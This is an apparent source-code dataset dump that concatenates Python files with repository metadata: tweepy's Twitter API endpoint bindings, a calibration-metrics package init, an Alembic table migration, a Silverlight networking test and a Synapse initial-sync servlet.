:allowed_param: 'id', 'user_id', 'screen_name', 'cursor', 'count'
"""
return bind_api(
api=self,
path='/followers/ids.json',
payload_type='ids',
allowed_param=['id', 'user_id', 'screen_name', 'cursor', 'count']
)
@property
def followers(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/follow-search-get-users/api-reference/get-followers-list
:allowed_param: 'id', 'user_id', 'screen_name', 'cursor', 'count',
'skip_status', 'include_user_entities'
"""
return bind_api(
api=self,
path='/followers/list.json',
payload_type='user', payload_list=True,
allowed_param=['id', 'user_id', 'screen_name', 'cursor', 'count',
'skip_status', 'include_user_entities']
)
@property
def get_settings(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/manage-account-settings/api-reference/get-account-settings """
return bind_api(
api=self,
path='/account/settings.json',
payload_type='json',
use_cache=False
)
@property
def set_settings(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/manage-account-settings/api-reference/post-account-settings
:allowed_param: 'sleep_time_enabled', 'start_sleep_time',
'end_sleep_time', 'time_zone',
'trend_location_woeid',
'allow_contributor_request', 'lang'
"""
return bind_api(
api=self,
path='/account/settings.json',
method='POST',
payload_type='json',
allowed_param=['sleep_time_enabled', 'start_sleep_time',
'end_sleep_time', 'time_zone',
'trend_location_woeid',
'allow_contributor_request', 'lang'],
use_cache=False
)
def verify_credentials(self, **kwargs):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/manage-account-settings/api-reference/get-account-verify_credentials
:allowed_param: 'include_entities', 'skip_status', 'include_email'
"""
if 'include_email' in kwargs:
kwargs['include_email'] = str(kwargs['include_email']).lower()
try:
return bind_api(
api=self,
path='/account/verify_credentials.json',
payload_type='user',
require_auth=True,
allowed_param=['include_entities', 'skip_status',
'include_email'],
)(**kwargs)
except TweepError as e:
if e.response is not None and e.response.status_code == 401:
return False
raise
@property
def rate_limit_status(self):
""" :reference: https://developer.twitter.com/en/docs/developer-utilities/rate-limit-status/api-reference/get-application-rate_limit_status
:allowed_param: 'resources'
"""
return bind_api(
api=self,
path='/application/rate_limit_status.json',
payload_type='json',
allowed_param=['resources'],
use_cache=False
)
def update_profile_image(self, filename, file_=None):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/manage-account-settings/api-reference/post-account-update_profile_image
:allowed_param: 'include_entities', 'skip_status'
"""
headers, post_data = API._pack_image(filename, 700, f=file_)
return bind_api(
api=self,
path='/account/update_profile_image.json',
method='POST',
payload_type='user',
allowed_param=['include_entities', 'skip_status'],
require_auth=True
)(self, post_data=post_data, headers=headers)
def update_profile_background_image(self, filename, **kwargs):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/manage-account-settings/api-reference/post-account-update_profile_background_image
:allowed_param: 'tile', 'include_entities', 'skip_status', 'use'
"""
f = kwargs.pop('file', None)
headers, post_data = API._pack_image(filename, 800, f=f)
return bind_api(
api=self,
path='/account/update_profile_background_image.json',
method='POST',
payload_type='user',
allowed_param=['tile', 'include_entities', 'skip_status', 'use'],
require_auth=True
)(post_data=post_data, headers=headers)
def update_profile_banner(self, filename, **kwargs):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/manage-account-settings/api-reference/post-account-update_profile_banner
:allowed_param: 'width', 'height', 'offset_left', 'offset_right'
"""
f = kwargs.pop('file', None)
headers, post_data = API._pack_image(filename, 700,
form_field='banner', f=f)
return bind_api(
api=self,
path='/account/update_profile_banner.json',
method='POST',
allowed_param=['width', 'height', 'offset_left', 'offset_right'],
require_auth=True
)(post_data=post_data, headers=headers)
@property
def update_profile(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/manage-account-settings/api-reference/post-account-update_profile
:allowed_param: 'name', 'url', 'location', 'description',
'profile_link_color'
"""
return bind_api(
api=self,
path='/account/update_profile.json',
method='POST',
payload_type='user',
allowed_param=['name', 'url', 'location', 'description',
'profile_link_color'],
require_auth=True
)
@property
def favorites(self):
""" :reference: https://developer.twitter.com/en/docs/tweets/post-and-engage/api-reference/get-favorites-list
:allowed_param: 'screen_name', 'user_id', 'max_id', 'count',
'since_id', 'max_id'
"""
return bind_api(
api=self,
path='/favorites/list.json',
payload_type='status', payload_list=True,
allowed_param=['screen_name', 'user_id', 'max_id', 'count',
'since_id', 'max_id']
)
@property
def create_favorite(self):
""" :reference: https://developer.twitter.com/en/docs/tweets/post-and-engage/api-reference/post-favorites-create
:allowed_param: 'id'
"""
return bind_api(
api=self,
path='/favorites/create.json',
method='POST',
payload_type='status',
allowed_param=['id'],
require_auth=True
)
@property
def destroy_favorite(self):
""" :reference: https://developer.twitter.com/en/docs/tweets/post-and-engage/api-reference/post-favorites-destroy
:allowed_param: 'id'
"""
return bind_api(
api=self,
path='/favorites/destroy.json',
method='POST',
payload_type='status',
allowed_param=['id'],
require_auth=True
)
@property
def create_block(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/mute-block-report-users/api-reference/post-blocks-create
:allowed_param: 'id', 'user_id', 'screen_name'
"""
return bind_api(
api=self,
path='/blocks/create.json',
method='POST',
payload_type='user',
allowed_param=['id', 'user_id', 'screen_name'],
require_auth=True
)
@property
def destroy_block(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/mute-block-report-users/api-reference/post-blocks-destroy
:allowed_param: 'id', 'user_id', 'screen_name'
"""
return bind_api(
api=self,
path='/blocks/destroy.json',
method='POST',
payload_type='user',
allowed_param=['id', 'user_id', 'screen_name'],
require_auth=True
)
@property
def mutes_ids(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/mute-block-report-users/api-reference/get-mutes-users-ids
:allowed_param: 'cursor'
"""
return bind_api(
api=self,
path='/mutes/users/ids.json',
payload_type='ids',
allowed_param=['cursor'],
require_auth=True
)
@property
def mutes(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/mute-block-report-users/api-reference/get-mutes-users-list
:allowed_param: 'cursor', 'include_entities', 'skip_status'
"""
return bind_api(
api=self,
path='/mutes/users/list.json',
payload_type='user', payload_list=True,
allowed_param=['cursor', 'include_entities', 'skip_status'],
required_auth=True
)
@property
def create_mute(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/mute-block-report-users/api-reference/post-mutes-users-create
:allowed_param: 'id', 'user_id', 'screen_name'
"""
return bind_api(
api=self,
path='/mutes/users/create.json',
method='POST',
payload_type='user',
allowed_param=['id', 'user_id', 'screen_name'],
require_auth=True
)
@property
def destroy_mute(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/mute-block-report-users/api-reference/post-mutes-users-destroy
:allowed_param: 'id', 'user_id', 'screen_name'
"""
return bind_api(
api=self,
path='/mutes/users/destroy.json',
method='POST',
payload_type='user',
allowed_param=['id', 'user_id', 'screen_name'],
require_auth=True
)
@property
def blocks(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/mute-block-report-users/api-reference/get-blocks-list
:allowed_param: 'cursor'
"""
return bind_api(
api=self,
path='/blocks/list.json',
payload_type='user', payload_list=True,
allowed_param=['cursor'],
require_auth=True
)
@property
def blocks_ids(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/mute-block-report-users/api-reference/get-blocks-ids
:allowed_param: 'cursor'
"""
return bind_api(
api=self,
path='/blocks/ids.json',
payload_type='ids',
allowed_param=['cursor'],
require_auth=True
)
@property
def report_spam(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/mute-block-report-users/api-reference/post-users-report_spam
:allowed_param: 'user_id', 'screen_name', 'perform_block'
"""
return bind_api(
api=self,
path='/users/report_spam.json',
method='POST',
payload_type='user',
allowed_param=['user_id', 'screen_name', 'perform_block'],
require_auth=True
)
@property
def saved_searches(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/manage-account-settings/api-reference/get-saved_searches-list """
return bind_api(
api=self,
path='/saved_searches/list.json',
payload_type='saved_search', payload_list=True,
require_auth=True
)
@property
def get_saved_search(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/manage-account-settings/api-reference/get-saved_searches-show-id
:allowed_param: 'id'
"""
return bind_api(
api=self,
path='/saved_searches/show/{id}.json',
payload_type='saved_search',
allowed_param=['id'],
require_auth=True
)
@property
def create_saved_search(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/manage-account-settings/api-reference/post-saved_searches-create
:allowed_param: 'query'
"""
return bind_api(
api=self,
path='/saved_searches/create.json',
method='POST',
payload_type='saved_search',
allowed_param=['query'],
require_auth=True
)
@property
def destroy_saved_search(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/manage-account-settings/api-reference/post-saved_searches-destroy-id
:allowed_param: 'id'
"""
return bind_api(
api=self,
path='/saved_searches/destroy/{id}.json',
method='POST',
payload_type='saved_search',
allowed_param=['id'],
require_auth=True
)
@property
def create_list(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/create-manage-lists/api-reference/post-lists-create
:allowed_param: 'name', 'mode', 'description'
"""
return bind_api(
api=self,
path='/lists/create.json',
method='POST',
payload_type='list',
allowed_param=['name', 'mode', 'description'],
require_auth=True
)
@property
def destroy_list(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/create-manage-lists/api-reference/post-lists-destroy
:allowed_param: 'owner_screen_name', 'owner_id', 'list_id', 'slug'
"""
return bind_api(
api=self,
path='/lists/destroy.json',
method='POST',
payload_type='list',
allowed_param=['owner_screen_name', 'owner_id', 'list_id', 'slug'],
require_auth=True
)
@property
def update_list(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/create-manage-lists/api-reference/post-lists-update
:allowed_param: 'list_id', 'slug', 'name', 'mode', 'description',
'owner_screen_name', 'owner_id'
"""
return bind_api(
api=self,
path='/lists/update.json',
method='POST',
payload_type='list',
allowed_param=['list_id', 'slug', 'name', 'mode', 'description',
'owner_screen_name', 'owner_id'],
require_auth=True
)
@property
def lists_all(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/create-manage-lists/api-reference/get-lists-list
:allowed_param: 'screen_name', 'user_id', 'reverse'
"""
return bind_api(
api=self,
path='/lists/list.json',
payload_type='list', payload_list=True,
allowed_param=['screen_name', 'user_id', 'reverse'],
require_auth=True
)
@property
def lists_memberships(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/create-manage-lists/api-reference/get-lists-memberships
:allowed_param: 'screen_name', 'user_id', 'filter_to_owned_lists',
'cursor', 'count'
"""
return bind_api(
api=self,
path='/lists/memberships.json',
payload_type='list', payload_list=True,
allowed_param=['screen_name', 'user_id', 'filter_to_owned_lists',
'cursor', 'count'],
require_auth=True
)
@property
def lists_subscriptions(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/create-manage-lists/api-reference/get-lists-subscriptions
:allowed_param: 'screen_name', 'user_id', 'cursor', 'count'
"""
return bind_api(
api=self,
path='/lists/subscriptions.json',
payload_type='list', payload_list=True,
allowed_param=['screen_name', 'user_id', 'cursor', 'count'],
require_auth=True
)
@property
def list_timeline(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/create-manage-lists/api-reference/get-lists-statuses
:allowed_param: 'owner_screen_name', 'slug', 'owner_id', 'list_id',
'since_id', 'max_id', 'count', 'include_entities',
'include_rts'
"""
return bind_api(
api=self,
path='/lists/statuses.json',
payload_type='status', payload_list=True,
allowed_param=['owner_screen_name', 'slug', 'owner_id', 'list_id',
'since_id', 'max_id', 'count', 'include_entities',
'include_rts']
)
@property
def get_list(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/create-manage-lists/api-reference/get-lists-show
:allowed_param: 'owner_screen_name', 'owner_id', 'slug', 'list_id'
"""
return bind_api(
api=self,
path='/lists/show.json',
payload_type='list',
allowed_param=['owner_screen_name', 'owner_id', 'slug', 'list_id']
)
@property
def add_list_member(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/create-manage-lists/api-reference/post-lists-members-create
:allowed_param: 'screen_name', 'user_id', 'owner_screen_name',
'owner_id', 'slug', 'list_id'
"""
return bind_api(
api=self,
path='/lists/members/create.json',
method='POST',
payload_type='list',
allowed_param=['screen_name', 'user_id', 'owner_screen_name',
'owner_id', 'slug', 'list_id'],
require_auth=True
)
@property
def remove_list_member(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/create-manage-lists/api-reference/post-lists-members-destroy
:allowed_param: 'screen_name', 'user_id', 'owner_screen_name',
'owner_id', 'slug', 'list_id'
"""
return bind_api(
api=self,
path='/lists/members/destroy.json',
method='POST',
payload_type='list',
allowed_param=['screen_name', 'user_id', 'owner_screen_name',
'owner_id', 'slug', 'list_id'],
require_auth=True
)
def add_list_members(self, screen_name=None, user_id=None, slug=None,
list_id=None, owner_id=None, owner_screen_name=None):
""" Perform bulk add of list members from user ID or screenname """
return self._add_list_members(list_to_csv(screen_name),
list_to_csv(user_id), slug, list_id,
owner_id, owner_screen_name)
@property
def _add_list_members(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/create-manage-lists/api-reference/post-lists-members-create_all
:allowed_param: 'screen_name', 'user_id', 'slug', 'list_id',
'owner_id', 'owner_screen_name'
"""
return bind_api(
api=self,
path='/lists/members/create_all.json',
method='POST',
payload_type='list',
allowed_param=['screen_name', 'user_id', 'slug', 'list_id',
'owner_id', 'owner_screen_name'],
require_auth=True
)
def remove_list_members(self, screen_name=None, user_id=None, slug=None,
list_id=None, owner_id=None,
owner_screen_name=None):
""" Perform bulk remove of list members from user ID or screenname """
return self._remove_list_members(list_to_csv(screen_name),
list_to_csv(user_id), slug, list_id,
owner_id, owner_screen_name)
@property
def _remove_list_members(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/create-manage-lists/api-reference/post-lists-members-destroy_all
:allowed_param: 'screen_name', 'user_id', 'slug', 'list_id',
'owner_id', 'owner_screen_name'
"""
return bind_api(
api=self,
path='/lists/members/destroy_all.json',
method='POST',
payload_type='list',
allowed_param=['screen_name', 'user_id', 'slug', 'list_id',
'owner_id', 'owner_screen_name'],
require_auth=True
)
@property
def list_members(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/create-manage-lists/api-reference/get-lists-members
:allowed_param: 'owner_screen_name', 'slug', 'list_id', 'owner_id',
'cursor'
"""
return bind_api(
api=self,
path='/lists/members.json',
payload_type='user', payload_list=True,
allowed_param=['owner_screen_name', 'slug', 'list_id', 'owner_id',
'cursor']
)
@property
def show_list_member(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/create-manage-lists/api-reference/get-lists-members-show
:allowed_param: 'list_id', 'slug', 'user_id', 'screen_name',
'owner_screen_name', 'owner_id'
"""
return bind_api(
api=self,
path='/lists/members/show.json',
payload_type='user',
allowed_param=['list_id', 'slug', 'user_id', 'screen_name',
'owner_screen_name', 'owner_id']
)
@property
def subscribe_list(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/create-manage-lists/api-reference/post-lists-subscribers-create
:allowed_param: 'owner_screen_name', 'slug', 'owner_id', 'list_id'
"""
return bind_api(
api=self,
path='/lists/subscribers/create.json',
method='POST',
payload_type='list',
allowed_param=['owner_screen_name', 'slug', 'owner_id', 'list_id'],
require_auth=True
)
@property
def unsubscribe_list(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/create-manage-lists/api-reference/post-lists-subscribers-destroy
:allowed_param: 'owner_screen_name', 'slug', 'owner_id', 'list_id'
"""
return bind_api(
api=self,
path='/lists/subscribers/destroy.json',
method='POST',
payload_type='list',
allowed_param=['owner_screen_name', 'slug', 'owner_id', 'list_id'],
require_auth=True
)
@property
def list_subscribers(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/create-manage-lists/api-reference/get-lists-subscribers
:allowed_param: 'owner_screen_name', 'slug', 'owner_id', 'list_id',
'cursor', 'count', 'include_entities',
'skip_status'
"""
return bind_api(
api=self,
path='/lists/subscribers.json',
payload_type='user', payload_list=True,
allowed_param=['owner_screen_name', 'slug', 'owner_id', 'list_id',
'cursor', 'count', 'include_entities',
'skip_status']
)
@property
def show_list_subscriber(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/create-manage-lists/api-reference/get-lists-subscribers-show
:allowed_param: 'owner_screen_name', 'slug', 'screen_name',
'owner_id', 'list_id', 'user_id'
"""
return bind_api(
api=self,
path='/lists/subscribers/show.json',
payload_type='user',
allowed_param=['owner_screen_name', 'slug', 'screen_name',
'owner_id', 'list_id', 'user_id']
)
@property
def trends_available(self):
""" :reference: https://developer.twitter.com/en/docs/trends/locations-with-trending-topics/api-reference/get-trends-available """
return bind_api(
api=self,
path='/trends/available.json',
payload_type='json'
)
@property
def trends_place(self):
""" :reference: https://developer.twitter.com/en/docs/trends/trends-for-location/api-reference/get-trends-place
:allowed_param: 'id', 'exclude'
"""
return bind_api(
api=self,
path='/trends/place.json',
payload_type='json',
allowed_param=['id', 'exclude']
)
@property
def trends_closest(self):
""" :reference: https://developer.twitter.com/en/docs/trends/locations-with-trending-topics/api-reference/get-trends-closest
:allowed_param: 'lat', 'long'
"""
return bind_api(
api=self,
path='/trends/closest.json',
payload_type='json',
allowed_param=['lat', 'long']
)
@property
def search(self):
""" :reference: https://developer.twitter.com/en/docs/tweets/search/api-reference/get-search-tweets
:allowed_param: 'q', 'lang', 'locale', 'since_id', 'geocode',
'max_id', 'until', 'result_type', 'count',
'include_entities'
"""
return bind_api(
api=self,
path='/search/tweets.json',
payload_type='search_results',
allowed_param=['q', 'lang', 'locale', 'since_id', 'geocode',
'max_id', 'until', 'result_type', 'count',
'include_entities']
)
@pagination(mode='next')
def search_30_day(self, environment_name, *args, **kwargs):
""" :reference: https://developer.twitter.com/en/docs/tweets/search/api-reference/premium-search
:allowed_param: 'query', 'tag', 'fromDate', 'toDate', 'maxResults',
'next'
"""
return bind_api(
api=self,
path='/tweets/search/30day/{}.json'.format(environment_name),
payload_type='status', payload_list=True,
allowed_param=['query', 'tag', 'fromDate', 'toDate', 'maxResults',
'next'],
require_auth=True
)(*args, **kwargs)
@pagination(mode='next')
def search_full_archive(self, environment_name, *args, **kwargs):
""" :reference: https://developer.twitter.com/en/docs/tweets/search/api-reference/premium-search
:allowed_param: 'query', 'tag', 'fromDate', 'toDate', 'maxResults',
'next'
"""
return bind_api(
api=self,
path='/tweets/search/fullarchive/{}.json'.format(environment_name),
payload_type='status', payload_list=True,
allowed_param=['query', 'tag', 'fromDate', 'toDate', 'maxResults',
'next'],
require_auth=True
)(*args, **kwargs)
@property
def reverse_geocode(self):
""" :reference: https://developer.twitter.com/en/docs/geo/places-near-location/api-reference/get-geo-reverse_geocode
:allowed_param: 'lat', 'long', 'accuracy', 'granularity',
'max_results'
"""
return bind_api(
api=self,
path='/geo/reverse_geocode.json',
payload_type='place', payload_list=True,
allowed_param=['lat', 'long', 'accuracy', 'granularity',
'max_results']
)
@property
def geo_id(self):
""" :reference: https://developer.twitter.com/en/docs/geo/place-information/api-reference/get-geo-id-place_id
:allowed_param: 'id'
"""
return bind_api(
api=self,
path='/geo/id/{id}.json',
payload_type='place',
allowed_param=['id']
)
@property
def geo_search(self):
""" :reference: https://developer.twitter.com/en/docs/geo/places-near-location/api-reference/get-geo-search
:allowed_param: 'lat', 'long', 'query', 'ip', 'granularity',
'accuracy', 'max_results', 'contained_within'
"""
return bind_api(
api=self,
path='/geo/search.json',
payload_type='place', payload_list=True,
allowed_param=['lat', 'long', 'query', 'ip', 'granularity',
'accuracy', 'max_results', 'contained_within']
)
@property
def geo_similar_places(self):
""" :reference: https://dev.twitter.com/rest/reference/get/geo/similar_places
:allowed_param:'lat', 'long', 'name', 'contained_within'
"""
return bind_api(
api=self,
path='/geo/similar_places.json',
payload_type='place', payload_list=True,
allowed_param=['lat', 'long', 'name', 'contained_within']
)
@property
def supported_languages(self):
""" :reference: https://developer.twitter.com/en/docs/developer-utilities/supported-languages/api-reference/get-help-languages """
return bind_api(
api=self,
path='/help/languages.json',
payload_type='json',
require_auth=True
)
@property
def configuration(self):
""" :reference: https://developer.twitter.com/en/docs/developer-utilities/configuration/api-reference/get-help-configuration """
return bind_api(
api=self,
path='/help/configuration.json',
payload_type='json',
require_auth=True
)
""" Internal use only """
@staticmethod
def _pack_image(filename, max_size, form_field='image', f=None, file_type=None):
"""Pack image from file into multipart-formdata post body"""
# image must be less than 700kb in size
if f is None:
try:
if os.path.getsize(filename) > (max_size * 1024):
raise TweepError('File is too big, must be less than %skb.'
% max_size)
except os.error as e:
raise TweepError('Unable to access file: %s' % e.strerror)
# build the mulitpart-formdata body
fp = open(filename, 'rb')
else:
f.seek(0, 2) # Seek to end of file
if f.tell() > (max_size * 1024):
raise TweepError('File is too big, must be less than %skb.'
% max_size)
f.seek(0) # Reset to beginning of file
fp = f
# image must be gif, jpeg, png, webp
if not file_type:
file_type = imghdr.what(filename) or mimetypes.guess_type(filename)[0]
if file_type is None:
raise TweepError('Could not determine file type')
if file_type in ['gif', 'jpeg', 'png', 'webp']:
file_type = 'image/' + file_type
elif file_type not in ['image/gif', 'image/jpeg', 'image/png']:
raise TweepError('Invalid file type for image: %s' % file_type)
if isinstance(filename, six.text_type):
filename = filename.encode('utf-8')
BOUNDARY = b'Tw3ePy'
body = []
body.append(b'--' + BOUNDARY)
body.append('Content-Disposition: form-data; name="{0}";'
' filename="{1}"'.format(form_field, filename)
.encode('utf-8'))
body.append('Content-Type: {0}'.format(file_type).encode('utf-8'))
body.append(b'')
body.append(fp.read())
body.append(b'--' + BOUNDARY + b'--')
body.append(b'')
fp.close()
body = b'\r\n'.join(body)
# build headers
headers = {
'Content-Type': 'multipart/form-data; boundary=Tw3ePy',
'Content-Length': str(len(body))
}
return headers, body
| 39.766001 | 163 | 0.562461 |
4a2599ec80382411ffca42f201b08226ae28e28a | 329 | py | Python | explicalib/calibration/evaluation/metrics/confidence/__init__.py | euranova/estimating_eces | 9bfa81dd7a39ebe069c5b11b8e7a9bf9017e9350 | [
"MIT"
] | 2 | 2021-11-30T18:44:11.000Z | 2021-11-30T18:44:19.000Z | explicalib/calibration/evaluation/metrics/confidence/__init__.py | euranova/estimating_eces | 9bfa81dd7a39ebe069c5b11b8e7a9bf9017e9350 | [
"MIT"
] | null | null | null | explicalib/calibration/evaluation/metrics/confidence/__init__.py | euranova/estimating_eces | 9bfa81dd7a39ebe069c5b11b8e7a9bf9017e9350 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
@author: nicolas.posocco
"""
# confidence_ece estimators
from .direct_confidence_ece import direct_confidence_ece
from .confidence_ece import confidence_ece
from .confidence_ece_a import confidence_ece_a
from .confidence_ece_c import confidence_ece_c
from .confidence_ece_ac import confidence_ece_ac
| 27.416667 | 56 | 0.826748 |
4a259b65c4db659f5f5954fde7d473bb52213eba | 1,852 | py | Python | alembic/versions/28df99db32ca_create_mod_release_artifact_table.py | modist-io/modist-api | 827d4b1962caee9a2fde1470df30d8fd60f8f998 | [
"0BSD"
] | 1 | 2021-01-03T00:20:07.000Z | 2021-01-03T00:20:07.000Z | alembic/versions/28df99db32ca_create_mod_release_artifact_table.py | modist-io/modist-api | 827d4b1962caee9a2fde1470df30d8fd60f8f998 | [
"0BSD"
] | null | null | null | alembic/versions/28df99db32ca_create_mod_release_artifact_table.py | modist-io/modist-api | 827d4b1962caee9a2fde1470df30d8fd60f8f998 | [
"0BSD"
] | null | null | null | """Create mod_release_artifact table.
Revision ID: 28df99db32ca
Revises: 8e07c57c53c1
Create Date: 2020-04-15 18:12:20.554994
"""
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
from alembic import op
# revision identifiers, used by Alembic.
revision = "28df99db32ca"
down_revision = "8e07c57c53c1"
branch_labels = None
depends_on = None
def upgrade():
"""Pushes changes into the database."""
op.create_table(
"mod_release_artifact",
sa.Column(
"id",
postgresql.UUID(as_uuid=True),
server_default=sa.text("uuid_generate_v4()"),
nullable=False,
),
sa.Column(
"created_at",
sa.DateTime(timezone=True),
server_default=sa.text("now()"),
nullable=False,
),
sa.Column(
"updated_at",
sa.DateTime(timezone=True),
server_default=sa.text("now()"),
nullable=False,
),
sa.Column("is_active", sa.Boolean(), server_default="true", nullable=False),
sa.Column("name", sa.Text(), nullable=False),
sa.Column("path", sa.Text(), nullable=False),
sa.Column("size", sa.Integer(), nullable=False),
sa.Column("mimetype", sa.Text(), nullable=False),
sa.Column("checksum", sa.String(length=64), nullable=False),
sa.Column("mod_release_id", postgresql.UUID(as_uuid=True), nullable=False),
sa.ForeignKeyConstraint(
["mod_release_id"], ["mod_release.id"], ondelete="cascade"
),
sa.PrimaryKeyConstraint("id"),
)
op.create_refresh_updated_at_trigger("mod_release_artifact")
def downgrade():
"""Reverts changes performed by upgrade()."""
op.drop_refresh_updated_at_trigger("mod_release_artifact")
op.drop_table("mod_release_artifact")
| 29.396825 | 84 | 0.62635 |
4a259b9b1ba7f3d0ababf401245ce6f4f79f382d | 2,175 | py | Python | Src/Hosts/Silverlight/Tests/tests/regressions/test_net.py | jdhardy/dlr | dca078fbf9d103fad4dcabda76795a23d82106bc | [
"Apache-2.0"
] | null | null | null | Src/Hosts/Silverlight/Tests/tests/regressions/test_net.py | jdhardy/dlr | dca078fbf9d103fad4dcabda76795a23d82106bc | [
"Apache-2.0"
] | null | null | null | Src/Hosts/Silverlight/Tests/tests/regressions/test_net.py | jdhardy/dlr | dca078fbf9d103fad4dcabda76795a23d82106bc | [
"Apache-2.0"
] | null | null | null | from System import Uri, AsyncCallback
from System.IO import StreamReader
from System.Net import WebRequest
from System.Windows.Browser import HtmlPage
import time
import unittest
from System.Windows.Threading import Dispatcher
from System.Threading import ManualResetEvent, Thread, ThreadStart
are = ManualResetEvent(False)
TEST_NET_CONTENT = '[[[CONTENT OF TEST_NET.TXT]]]'
def puts(*a):
print(a)
def web_request(obj, uri_string, func):
req = WebRequest.Create(Uri(uri_string))
req.BeginGetResponse(AsyncCallback(web_complete(obj, func)), req)
def web_complete(obj, func):
def __web_complete(a):
req = a.AsyncState
res = req.EndGetResponse(a)
content = StreamReader(res.GetResponseStream()).ReadToEnd()
func(content)
are.Set()
return __web_complete
class NetRegression(unittest.TestCase):
def test_net_local(self):
thread = Thread(ThreadStart(self.do_test_net_local))
thread.Start()
are.WaitOne(5000)
def do_test_net_local(self):
HtmlPage.Dispatcher.BeginInvoke(
lambda: web_request(self, Uri(HtmlPage.Document.DocumentUri, 'tests/regressions/fixtures/test_net.txt').ToString(), self.verify_test_net_local)
)
def verify_test_net_local(self, result):
self.assertEqual(result, TEST_NET_CONTENT)
#sl.log_scenario('url on app on different hosts, fails in any case ***')
#CallNet('http://ironpython/silverlight-samples/test_net.txt', False)
#
#sl.log_scenario('url to same app, expect to work on http request')
#CallNet(Uri(HtmlPage.Document.DocumentUri, 'test_net.txt').AbsoluteUri, True)
#
#sl.log_scenario('pysical path to same app, only works on file share ***')
#CallNet('file:///C:/inetpub/wwwroot/silverlighttestapp/test_net/test_net.txt', False)
#
##sl.log_info(dir(HtmlPage.DocumentUri))
##CallNet(HtmlPage.DocumentUri.get_LocalPath(), False)
#
##sl.log_scenario('url to child app on same server, works for http ***')
##CallNet('http://ironpython/networkingservice/test_net.txt')
#
##sl.log_scenario('url to different site on same server, works for http ***')
##CallNet('http://localhost/files/test_net.txt')
#
#sl.log_done()
#
| 33.461538 | 153 | 0.731954 |
4a259bba641f019255af1e4fb9d505e6759af4d5 | 1,589 | py | Python | synapse/rest/client/v1/initial_sync.py | rzr/synapse | 16026e60c5381abcfea12f55b57f8d0ce474c402 | [
"Apache-2.0"
] | null | null | null | synapse/rest/client/v1/initial_sync.py | rzr/synapse | 16026e60c5381abcfea12f55b57f8d0ce474c402 | [
"Apache-2.0"
] | null | null | null | synapse/rest/client/v1/initial_sync.py | rzr/synapse | 16026e60c5381abcfea12f55b57f8d0ce474c402 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2014, 2015 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from twisted.internet import defer
from synapse.streams.config import PaginationConfig
from base import ClientV1RestServlet, client_path_pattern
# TODO: Needs unit testing
class InitialSyncRestServlet(ClientV1RestServlet):
PATTERN = client_path_pattern("/initialSync$")
@defer.inlineCallbacks
def on_GET(self, request):
user, client = yield self.auth.get_user_by_req(request)
with_feedback = "feedback" in request.args
as_client_event = "raw" not in request.args
pagination_config = PaginationConfig.from_request(request)
handler = self.handlers.message_handler
content = yield handler.snapshot_all_rooms(
user_id=user.to_string(),
pagin_config=pagination_config,
feedback=with_feedback,
as_client_event=as_client_event
)
defer.returnValue((200, content))
def register_servlets(hs, http_server):
InitialSyncRestServlet(hs).register(http_server)
| 35.311111 | 74 | 0.733166 |
4a259dac6d83cf604ebb4ad37fe3e80ec31395de | 18,306 | py | Python | homeassistant/components/isy994/binary_sensor.py | mikan-megane/core | 837220cce40890e296920d33a623adbc11bd15a6 | [
"Apache-2.0"
] | 11 | 2018-02-16T15:35:47.000Z | 2020-01-14T15:20:00.000Z | homeassistant/components/isy994/binary_sensor.py | mikan-megane/core | 837220cce40890e296920d33a623adbc11bd15a6 | [
"Apache-2.0"
] | 79 | 2020-07-23T07:13:37.000Z | 2022-03-22T06:02:37.000Z | homeassistant/components/isy994/binary_sensor.py | Vaarlion/core | f3de8b9f28de01abf72c0f5bb0b457eb1841f201 | [
"Apache-2.0"
